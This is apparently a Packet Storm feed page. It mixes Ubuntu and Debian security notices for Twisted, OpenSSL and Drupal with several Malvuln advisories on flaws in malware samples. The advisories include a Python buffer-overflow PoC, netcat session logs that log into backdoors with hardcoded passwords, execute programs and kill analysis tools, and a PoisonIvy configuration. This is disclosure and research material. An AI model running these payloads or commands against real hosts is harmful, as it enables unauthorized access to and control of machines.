OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer and Transport Layer Security protocols with full-strength cryptography world-wide.

OpenSSL Toolkit 3.0.15

Ubuntu Security Notice 6988-1 - It was discovered that Twisted incorrectly handled response order when processing multiple HTTP requests. A remote attacker could possibly use this issue to delay and manipulate responses. This issue only affected Ubuntu 24.04 LTS. It was discovered that Twisted did not properly sanitize certain input. An attacker could use this vulnerability to possibly execute an HTML injection leading to a cross-site scripting attack.

==========================================================================  
Ubuntu Security Notice USN-6988-1  
September 04, 2024

twisted vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Several security issues were fixed in Twisted.

Software Description:  
- twisted: Event-based framework for internet applications

Details:

It was discovered that Twisted incorrectly handled response order when  
processing multiple HTTP requests. A remote attacker could possibly use  
this issue to delay and manipulate responses.  
This issue only affected Ubuntu 24.04 LTS. (CVE-2024-41671)

It was discovered that Twisted did not properly sanitize certain input.  
An attacker could use this vulnerability to possibly execute an HTML  
injection leading to a cross-site scripting (XSS) attack.  
(CVE-2024-41810)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   python3-twisted                 24.3.0-1ubuntu0.1

Ubuntu 22.04 LTS  
   python3-twisted                 22.1.0-2ubuntu2.5

Ubuntu 20.04 LTS  
   python3-twisted                 18.9.0-11ubuntu0.20.04.4

Ubuntu 18.04 LTS  
   python-twisted                  17.9.0-2ubuntu0.3+esm1  
                                   Available with Ubuntu Pro  
   python3-twisted                 17.9.0-2ubuntu0.3+esm1  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   python-twisted                  16.0.0-1ubuntu0.4+esm2  
                                   Available with Ubuntu Pro  
   python3-twisted                 16.0.0-1ubuntu0.4+esm2  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   python-twisted                  13.2.0-1ubuntu1.2+esm3  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6988-1  
   CVE-2024-41671, CVE-2024-41810

Package Information:  
   https://launchpad.net/ubuntu/+source/twisted/24.3.0-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/twisted/22.1.0-2ubuntu2.5  
https://launchpad.net/ubuntu/+source/twisted/18.9.0-11ubuntu0.20.04.4

Ubuntu Security Notice USN-6988-1

Backdoor.Win32.Symmi.qua malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/6e81618678ddfee69342486f6b5ee780.txt  
Contact: malvuln13@gmail.com  
Media: x.com/malvuln  

Threat: Backdoor.Win32.Symmi.qua  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on two random high TCP ports, when connecting (ncat) one port will return a single character like "♣" ord(a) "9827" the other ports return no response, target the non responsive port. Third-party adversaries who can detect and reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH).  
Family: Symmi  
Type: PE32  
MD5: 6e81618678ddfee69342486f6b5ee780  
SHA256: a073f0bf8599352b57540930c36d655ba9e5a5afeb0c2606b07372e62476d3b3  
Vuln ID: MVID-2024-0692  
Dropped files: ksomnbi.dll   
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 09/03/2024

Memory Dump:  
(1834.3f0): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=fffff74a edx=027ff640 esi=00000000 edi=00000002  
eip=76fced3c esp=027ff038 ebp=027ff078 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
76fced3c c21400          ret     14h

0:007> .ecxr  
eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000  
eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
ksomnbi+0x1f32:  
10001f32 aa              stos    byte ptr es:[edi]          es:002b:02800000=00

0:007> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe  
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe

FAULTING_IP:   
ksomnbi+1f32  
10001f32 aa              stos    byte ptr es:[edi]

EXCEPTION_RECORD:  027ff23c -- (.exr 0x27ff23c)  
ExceptionAddress: 10001f32 (ksomnbi+0x00001f32)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 02800000  
Attempt to write to address 02800000

PROCESS_NAME:  Backdoor.Win32.Symmi.qua.6e81618678ddfee69342486f6b5ee780.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  027ff28c -- (.cxr 0x27ff28c)  
eax=027ff741 ebx=02517ff0 ecx=fffff74a edx=027ff640 esi=025188a7 edi=02800000  
eip=10001f32 esp=027ff6ec ebp=027ff6fc iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
ksomnbi+0x1f32:  
10001f32 aa              stos    byte ptr es:[edi]          es:002b:02800000=00  
Resetting default scope

WRITE_ADDRESS:  02800000 

FOLLOWUP_IP:   
ksomnbi+1f32  
10001f32 aa              stos    byte ptr es:[edi]

FAULTING_THREAD:  000003f0

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE

LAST_CONTROL_TRANSFER:  from 10002fc3 to 10001f32

STACK_TEXT:    
WARNING: Stack unwind information not available. Following frames may be wrong.  
027ff6fc 10002fc3 027ff74a 02517ff0 00000001 ksomnbi+0x1f32  
027fff80 41414141 41414141 41414141 41414141 ksomnbi+0x2fc3  
027fff84 41414141 41414141 41414141 41414141 0x41414141  
027fff88 41414141 41414141 41414141 41414141 0x41414141  
027fff8c 41414141 41414141 41414141 41414141 0x41414141  
027fff90 41414141 41414141 41414141 41414141 0x41414141  
027fff94 41414141 41414141 41414141 41414141 0x41414141  
027fff98 41414141 41414141 41414141 41414141 0x41414141  
027fff9c 41414141 41414141 41414141 41414141 0x41414141  
027fffa0 41414141 41414141 41414141 41414141 0x41414141  
027fffa4 41414141 41414141 41414141 41414141 0x41414141  
027fffa8 41414141 41414141 41414141 41414141 0x41414141  
027fffac 41414141 41414141 41414141 41414141 0x41414141  
027fffb0 41414141 41414141 41414141 41414141 0x41414141  
027fffb4 41414141 41414141 41414141 41414141 0x41414141  
027fffb8 41414141 41414141 41414141 41414141 0x41414141  
027fffbc 41414141 41414141 41414141 41414141 0x41414141  
027fffc0 41414141 41414141 41414141 41414141 0x41414141  
027fffc4 41414141 41414141 41414141 41414141 0x41414141  
027fffc8 41414141 41414141 41414141 41414141 0x41414141  
027fffcc 41414141 41414141 41414141 41414141 0x41414141  
027fffd0 41414141 41414141 41414141 41414141 0x41414141  
027fffd4 41414141 41414141 41414141 41414141 0x41414141  
027fffd8 41414141 41414141 41414141 41414141 0x41414141  
027fffdc 41414141 41414141 41414141 41414141 0x41414141  
027fffe0 41414141 41414141 41414141 41414141 0x41414141  
027fffe4 41414141 41414141 41414141 41414141 0x41414141  
027fffe8 41414141 41414141 41414141 41414141 0x41414141  
027fffec 41414141 41414141 41414141 41414141 0x41414141  
027ffff0 41414141 41414141 41414141 00000000 0x41414141  
027ffff4 41414141 41414141 00000000 00000000 0x41414141  
027ffff8 41414141 00000000 00000000 00000000 0x41414141  
027ffffc 00000000 00000000 00000000 00000000 0x41414141

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  ksomnbi+1f32

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: ksomnbi

IMAGE_NAME:  ksomnbi.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  537a7d0a

STACK_COMMAND:  .cxr 0x27ff28c ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_ksomnbi.dll!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_ksomnbi+1f32

Followup: MachineOwner  
---------

0:007> !exchain  
027ff0f0: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
027ff710: ksomnbi+30df (100030df)  
027fffcc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

def doit():

    MALWARE_HOST="x.x.x.x"  
    PORT=6917   #random port

    s=socket(AF_INET, SOCK_STREAM)  
    s.connect((MALWARE_HOST, PORT))

    PAYLOAD="CONNECT /"+"A"*2878 + " HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 2878\r\nHost: "+MALWARE_HOST  
    s.send(PAYLOAD.encode())  
    s.close()

while 1:  
    doit()  
    time.sleep(0.5)

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Symmi.qua MVID-2024-0692 Buffer Overflow

HackTool.Win32.Freezer.br (WinSpy) malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2992129c565e025ebcb0bb6f80c77812.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: HackTool.Win32.Freezer.br (WinSpy)Vulnerability: Insecure Credential StorageDescription: The malware listens on TCP ports 443, 80 and provides a web interface for remote access to victim information like screenshots etc.The username "AZURE" is in a hidden in a file named "resu.dll" under AppData\Local\Temp\Compress0 and the password is stored in cleartext "DREAMS" in "ssap.dll"Family: FreezerType: PE32MD5: 2992129c565e025ebcb0bb6f80c77812SHA256: e47a267cdc2a8443d5d7184e1023eef81c4b6a5bf9ecc24f1c6c345fe98bab8eVuln ID: MVID-2024-0691Disclosure: 09/03/2024Exploit/PoC:Login to the Win-Spy web UI using the credentials "AZURE" / "DREAMS" Web URLs available on the infected host.WebCam Shots (0)http://VICTIM_MACHINE/audio/Screen Shots (16)http://VICTIM_MACHINE/pictures/Reports (2)http://VICTIM_MACHINE/documents/Downloadclog.txtlog.txtDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

HackTool.Win32.Freezer.br (WinSpy) MVID-2024-0691 Insecure Credential Storage

Debian Linux Security Advisory 5764-1 - David Benjamin reported a flaw in the X.509 name checks in OpenSSL, a Secure Sockets Layer toolkit, which may cause an application performing certificate name checks to crash, resulting in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5764-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 03, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : opensslCVE ID         : CVE-2024-6119David Benjamin reported a flaw in the X.509 name checks in OpenSSL, aSecure Sockets Layer toolkit, which may cause an application performingcertificate name checks to crash, resulting in denial of service.Additional details can be found in the upstream advisory:https://openssl-library.org/news/secadv/20240903.txtFor the stable distribution (bookworm), this problem has been fixed inversion 3.0.14-1~deb12u2.We recommend that you upgrade your openssl packages.For the detailed security status of openssl please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/opensslFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmbXW1pfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RXThAAjRoSSUyNd4LR8nETi9XB31OkPVx0KrvU2hfIRnPUHHb3hOoi8vEKxdqhgd1pHtEKUBB3TBkXnyMuQ1p79+wuIjvV6Jr7uEPK0w2GdvC0KaF4+cohRDB7Xpjk+AjVFprvljePzgR9BcX1LWX/Bj6k7j8Jit4hkSDxeWn2W4NvCk9+1FMaHPa1PCmXAxo83qzlJg/SMcI5s19No3TzY9z9RdXH622J6hZk/DUZi6YMSryxCoAuU7ur/Ol8zGH8RG9THiC4hcnAnNjOrqAJqlLzoLgFxykwrvYGwWk//fsQsCeR2HXNQJiPBKq0QyoXP0WFgIbjnQlRfJI2gxwr5KWn77sNnc2vGZ8HXScj+pKOxrdHyp6a3kaZ99ANDCU5UAo36wSUhZyX9I8nNxjZmb2w5fbeFnHkI2xx2onoLeUjv4hzipS4VS0OP5ThqXhXGjLng4L0bIc5Ad/LuC4T/PnXuwfDgMnAQHHM0zjQcDih/TaTfXn1v+j67FIVBxiqD5EI07ms/jysbmpydB4z2Fwl0D09goEtbO2m2ZE+BU4o8dQIk6UB7KiKTBcyVS3uTR7ZG9AbomfHceh9/3ycI0FMTXUXlifU9v3Btuwpb3DnjCwJKaoAEQNrfuV1OjqV29oZd2ye2bwAC2uveAnS0wxe+26Gsr+PhmdUFSGSAPeULt4==KHr5-----END PGP SIGNATURE-----

Debian Security Advisory 5764-1

Backdoor.Win32.Optix.02.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/706ddc06ebbdde43e4e97de4d5af3b19.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.Optix.02.bVulnerability: Weak Hardcoded CredentialsDescription: Optix listens on TCP port 5151 and is packed with ASPack (2.11d). Unpacking is trivial set breakpoints on POPAD, RET, run and dump using OllyDumpEx. The unpacked PE file reveals a very weak three character cleartext password "1q1" stored as "svrpwd=1q1" at offset: 0000da4c of the unpacked malware. Commands sent to the backdoor use a semicolon ";" as a marker E.g. password;1q1;Family: OptixType: PE32MD5: 706ddc06ebbdde43e4e97de4d5af3b19SHA256: 2d38b18bdedfa7f27aac3f52a6d717f3cef7cf809e06f4a34ac0a93c90a82b1cVuln ID: MVID-2024-0690Disclosure: 09/03/2024Exploit/PoC:nc64.exe x.x.x.x 5151password;1q1;password;1;Optix Lite v0.2 Server Ready...ExecFile;"c:\Windows\System32\calc.exe"Response;File Ran SuccessfullyGetPath;TheServerPath;c:\windows\sec32.exeGetSysDir;TheSysDir;;C:\WINDOWS\system32\GetWinDir;TheWinDir;;C:\WINDOWS\KillProcPls;pestudio.exe;Response;Program killed successfully!KillProcPls;die.exe;Response;Program killed successfully!GetProcsPls;HeresDaProcs;[System Process];System;smss.exe;csrss.exe;wininit.exe;csrss.exe;winlogon.exe;services.exe;lsass.exe;fontdrvhost.exe;fontdrvhost.exe;svchost.exe;svchost.exe;dwm.exe;...Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Optix.02.b MVID-2024-0690 Hardcoded Credential

Ubuntu Security Notice 6986-1 - David Benjamin discovered that OpenSSL incorrectly handled certain X.509 certificates. An attacker could possible use this issue to cause a denial of service or expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6986-1  
September 03, 2024

openssl vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS

Summary:

OpenSSL could be made to crash or expose sensitive information  
if it received a specially crafted certificate.

Software Description:  
- openssl: Secure Socket Layer (SSL) cryptographic library and tools

Details:

David Benjamin discovered that OpenSSL incorrectly handled certain  
X.509 certificates. An attacker could possible use this issue to  
cause a denial of service or expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  libssl3t64                      3.0.13-0ubuntu3.4  
  openssl                         3.0.13-0ubuntu3.4

Ubuntu 22.04 LTS  
  libssl3                         3.0.2-0ubuntu1.18  
  openssl                         3.0.2-0ubuntu1.18

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6986-1  
  CVE-2024-6119

Package Information:  
  https://launchpad.net/ubuntu/+source/openssl/3.0.13-0ubuntu3.4  
  https://launchpad.net/ubuntu/+source/openssl/3.0.2-0ubuntu1.18

Ubuntu Security Notice USN-6986-1

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/4dc39c05bcc93e600dd8de16f2f7c599.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4)Vulnerability: Unauthenticated Remote Command ExecutionFamily: JustJokeType: PE32MD5: 4dc39c05bcc93e600dd8de16f2f7c599SHA256: 55662483e663bde98d729489c6b25986003a40df1e2be376b0c3b20d2d6c7987 Vuln ID: MVID-2024-0689Dropped files: Scanvegw.exeDisclosure: 09/03/2024Description: The malware listens on TCP port 28072.  Upon execution, throws an error alert dialog with message: "File DATA1.CAB not found!". The backdoor then drops a hidden PE file named "Scanvegw.exe" in SysWoW64 use attrib -s -h. The malware then makes outbound connections to SMTP port 25. Hit enter twice when sending commands use "E" for Execute and "T" for Terminate. Calling programs incorrectly still gives a response of "Executed!" when it actually fails. The malware calls Win32 WinExec API, supply full path to the file.0046A0CC                 push    eax             ; lpCmdLine0046A0CD                 call    WinExec0046A0D2                 push    offset aTmp     ; "tmp!?!"0046A0D7                 push    [ebp+var_C]0046A0DA                 push    offset aExecuted ; " Executed!"0046A0DF                 lea     eax, [ebp+var_168]0046A0E5                 mov     edx, 30046A0EA                 call    sub_40495CExploit/PoC:nc64.exe x.x.x.x 28072E "c:\\Windows\\System32\\calc.exe";tmp!?!"c:\\Windows\\System32\\calc.exe";Executed!E GetDir;tmp!?!GetDir; Executed!GetDir;C:\WINDOWS\system32@AudioToastIcon.png@EnrollmentToastIcon.png@VpnToastIcon.png@WirelessDisplayToast.pngaadauthhelper.dllaadtb.dllAboveLockAppHost.dllaccessibilitycpl.dllE GetDrive;tmp!?!GetDrive; Executed!GetDrive;c: d:GetFiles;GetSpace;Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.JustJoke.21 (BackDoor Pro - v2.0b4) MVID-2024-0689 Code Execution

Backdoor.Win32.PoisonIvy.ymw malware suffers from an insecure credential storage vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b0748f1c1a17bad44dc9bd750fc97547.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.PoisonIvy.ymwVulnerability: Insecure Credential StorageFamily: PoisonIvyType: PE32MD5: b0748f1c1a17bad44dc9bd750fc97547SHA256: 060c15f401ce4d38d70e7f60aabe31c81935d2c261e350c0ea34387886d48920Vuln ID: MVID-2024-0688Dropped files: PILib.dll, Poison Ivy.ini, .pipDisclosure: 09/03/2024Description: PoisonIvy listens on TCP port 3460 by default but that can be changed. When generating PoisonIvy PE files, credentials are stored in cleartext if not using the PasswordKey=1 option which gets stored in ".pik" files. The "Ivy.ini" configuration and profile ".pip" files also contain credentials in cleartext."malvuln.pip" [Advanced]PEbinary=1PEc=0PEd=0PEp=0PE=1FileAlign=512KeyLogger=0InjectServer=0Persistence=0ProcessMutex=)!VoqA.I4CustomInject=0CustomInjectProc=msnmsgr.exe[Connection]Group=HijackProxy=0HijackProxyPersist=0DNS=192.168.18.125:3460:0,ID=malvulnPassword=apparitionsecPasswordKey=0Proxy=0ProxyDNS=[Install]Startup=0StartupHKLM=1StartupActiveX=0ActiveXKey=HKLMName=Copy=0Filename=CopySystem=1CopyWindows=0ADS=0Melt=0[Build]Icon=bThirdParty=0ThirdParty=upx.exe "%s""Poison Ivy.ini"[Disclaimer]Show=1[Settings]RemoveKeyFile=1StorePlugins=1SDrounds=3HidePW=0PlaySound=0SoundPath=%PI%\sound.wavCache=1CachePath=%PI%\Users\%USR%\ImagePath=%PI%\Users\%USR%\Images\AudioPath=%PI%\Users\%USR%\Audio\NotesPath=%PI%\Notes\AutoRefresh=0WindowColor=1TimestampColor=1KeynameColor=1WindowName=008000Timestamp=0000FFKeyname=808080AutoRemove=1AutoLookUpdates=1SimTransfers=2DownloadPath=%PI%\Users\%USR%\Download\ProfilePath=%PI%\Profiles\PluginPath=%PI%\Plugins\TreeLayout=1CloseTray=0MinimizeTray=1BalloonTip=1Prompt=0PromptExit=0PromptDelete=1ColumnInfo=1Groups=0ColumnPath=%PI%\Data\Thumbs=0ThumbSize=96Highlight=0HighlightExt=ScrSize=75ScrBits=24ShareTo=ShareToSocks=ShareSocks=0[Placement]DataTransfers=1MaximizedState=0Top=63Left=416Width=936Height=540ConTop=132ConLeft=260ConWidth=650ConHeight=380[Client0]Port=3460KeyFile=0Password=adminExploit/PoC:DE:0055DD64 aPassword_7     db 'Password: *****',0  ; DATA XREF: sub_55D128+292↑oCODE:0055DD74                 dd 0FFFFFFFFh, 5CODE:0055DD7C aAdmin_2        db 'admin',0            ; DATA XREF: sub_55D128:loc_55D3C6↑o004016C0                 db  61h ; a004016C1                 db  70h ; p004016C2                 db  70h ; p004016C3                 db  61h ; a004016C4                 db  72h ; r004016C5                 db  69h ; i004016C6                 db  74h ; t004016C7                 db  69h ; i004016C8                 db  6Fh ; o004016C9                 db  6Eh ; n004016CA                 db  73h ; s004016CB                 db  65h ; e004016CC                 db  63h ; cDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.PoisonIvy.ymw MVID-2024-0688 Insecure Credential Storage

Ubuntu Security Notice 6981-2 - USN-6981-1 fixed vulnerabilities in Drupal. This update provides the corresponding updates for Ubuntu 14.04 LTS. It was discovered that Drupal incorrectly sanitized uploaded filenames. A remote attacker could possibly use this issue to execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6981-2September 03, 2024drupal7 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 14.04 LTSSummary:Drupal could be made to crash or run programs if it receivedspecially crafted network traffic.Software Description:- drupal7: fully-featured content management frameworkDetails:USN-6981-1 fixed vulnerabilities in Drupal. This update provides thecorresponding updates for Ubuntu 14.04 LTS.Original advisory details:  It was discovered that Drupal incorrectly sanitized uploaded filenames. A  remote attacker could possibly use this issue to execute arbitrary code.  (CVE-2020-13671)  It was discovered that Drupal incorrectly sanitized archived filenames. A  remote attacker could possibly use this issue to overwrite arbitrary  files, or execute arbitrary code. (CVE-2020-28948, CVE-2020-28949)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 14.04 LTS   drupal7                         7.26-1ubuntu0.1+esm2                                   Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6981-2   https://ubuntu.com/security/notices/USN-6981-1   CVE-2020-13671, CVE-2020-28948, CVE-2020-28949

Source

Packet Storm